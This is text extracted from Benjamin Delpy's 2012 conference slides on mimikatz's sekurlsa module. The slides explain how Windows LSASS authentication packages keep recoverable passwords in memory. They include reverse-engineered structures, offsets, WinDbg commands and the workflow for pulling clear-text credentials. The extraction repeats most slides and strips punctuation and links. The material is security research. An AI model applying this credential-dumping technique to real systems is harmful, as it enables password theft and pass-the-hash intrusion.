mod_mimikatz_inject mod_mimikatz_inject
mod_mimikatz_samdump mod_mimikatz_samdump
mod_mimikatz_standard mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle mod_mimikatz_handle
mod_mimikatz_system mod_mimikatz_system
mod_mimikatz_service mod_mimikatz_service
mod_mimikatz_process mod_mimikatz_process
mod_mimikatz_thread mod_mimikatz_thread
mod_mimikatz_terminalserver mod_mimikatz_terminalserver
mod_mimikatz_privilege mod_mimikatz_privilege
mod_pipe mod_pipe
mod_inject mod_inject
mod_memory mod_memory
mod_parseur mod_parseur
mod_patch mod_patch
mod_hive mod_hive
mod_secacl mod_secacl
mod_privilege mod_privilege
mod_process mod_process
mod_service mod_service
mod_system mod_system
mod_thread mod_thread
mod_ts mod_ts
mod_text mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0 msv_1_0
tspkg tspkg
wdigest wdigest
livessp livessp
kerberos kerberos
kappfreedll kappfreedll
kelloworlddll kelloworlddll
klockdll klockdll
mimikatzsys mimikatzsys
sekurlsadll
sam sam
secrets secrets
msv_1_0 msv_1_0
wdigest wdigest
livessp livessp
kerberos kerberos
tspkg tspkg
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
